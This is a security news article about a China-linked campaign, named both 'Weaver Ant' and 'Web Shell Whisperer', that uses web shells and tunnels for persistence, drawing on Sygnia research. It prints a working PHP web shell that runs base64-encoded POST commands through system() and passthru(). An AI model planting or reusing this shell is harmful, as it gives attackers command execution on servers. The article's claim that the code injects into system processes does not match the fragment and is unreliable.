Cyber Security News

Chinese Web Shell Whisperer Using Web Shells & Tunnels To Establish Persistence

A sophisticated threat actor dubbed “Weaver Ant,” Web Shell Whisperer has emerged from China, deploying advanced web shell payloads across critical infrastructure sectors worldwide.

This persistent campaign, active since late 2024, targets vulnerable web applications and content management systems in government, healthcare, and telecommunications organizations.

The attackers exploit known vulnerabilities in public-facing web servers to deploy customized web shells that create resilient command-and-control channels through encrypted tunneling mechanisms.

Initial access typically occurs through exploitation of unpatched vulnerabilities in web applications, including recently discovered zero-day flaws in popular content management systems.

Once embedded, the malicious actors deploy their signature web shells that masquerade as legitimate system files but contain obfuscated code enabling remote access and control.

These shells are cunningly designed to evade traditional signature-based detection by implementing polymorphic code that changes its appearance while maintaining functionality.

Sygnia researchers identified this campaign after investigating multiple independent intrusions sharing distinctive tactics, techniques, and procedures.

Web Shell Tunneling flow (Source – Sygnia)

Their analysis revealed the attackers’ unusual methodology of maintaining multiple persistence mechanisms simultaneously, allowing them to regain access even if one pathway is discovered and removed.

The researchers noted the attackers’ preference for targeting Linux-based web servers, where they exploit weak configurations to maintain long-term access.

The campaign has impacted over 75 organizations across 17 countries, with particular concentration in North America and Western Europe.

While data exfiltration has been observed in several cases, the primary objective appears to be establishing persistent access for long-term intelligence gathering rather than immediate financial gain.

Technical forensics revealed the attackers’ sophisticated approach to evading security controls through encrypted tunneling protocols that bypass traditional network monitoring solutions.

Advanced Persistence Techniques

The Web Shell Whisperer’s persistence mechanisms demonstrate exceptional sophistication through stealthy scheduling routines that reinstall access pathways even after remediation attempts.

Web shell deployment chain (Source – Sygnia)

The primary web shell employs a technique that injects code into legitimate system processes, as seen in this recovered fragment:-

<?php
$ch = base64_decode($_POST['hs92']);
if(md5($ch) === '3a7118d1f23e7cf41d30a2c5c6bc6798'){
    @system(base64_decode($_POST['cmd']));
    @passthru(base64_decode($_POST['cmd']));
}
?>

This seemingly innocuous code enables execution of arbitrary commands while implementing a challenge-response authentication mechanism that prevents unauthorized access to the shell’s functionality.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Hackers Target AI Infrastructure With RCE, Prompt Injection and API Key Theft

Hackers are actively probing AI systems, turning exposed gateways and agent tools into routes for…

4 hours ago

Hackers Make Phishing Pages Change Their Code Every Time Someone Opens Them

Hackers are making some phishing pages harder to track by changing the code delivered to…

5 hours ago

Iran-Linked Hackers Reportedly Knock UK Power Plant Offline for Four Days

A cyber incident reportedly forced a British power plant to halt operations for about four…

6 hours ago

Russian Hackers Use New HOOKEDGE Malware to Spy on European Defense and Diplomatic Targets

Russian hackers have used a new backdoor called HOOKEDGE to target defense manufacturers, government bodies,…

6 hours ago

Ransomware Gang Claims AI Can Analyze 700GB of Stolen Data Every Hour

TITAN ransomware is pairing file encryption with an ambitious claim: artificial intelligence that can sort…

6 hours ago

Hackers Compromise Hundreds of WordPress Sites to Deploy Amatera Stealer via ClickFix

A fake student resume is being used to place a remote-access tool on researchers’ Windows…

8 hours ago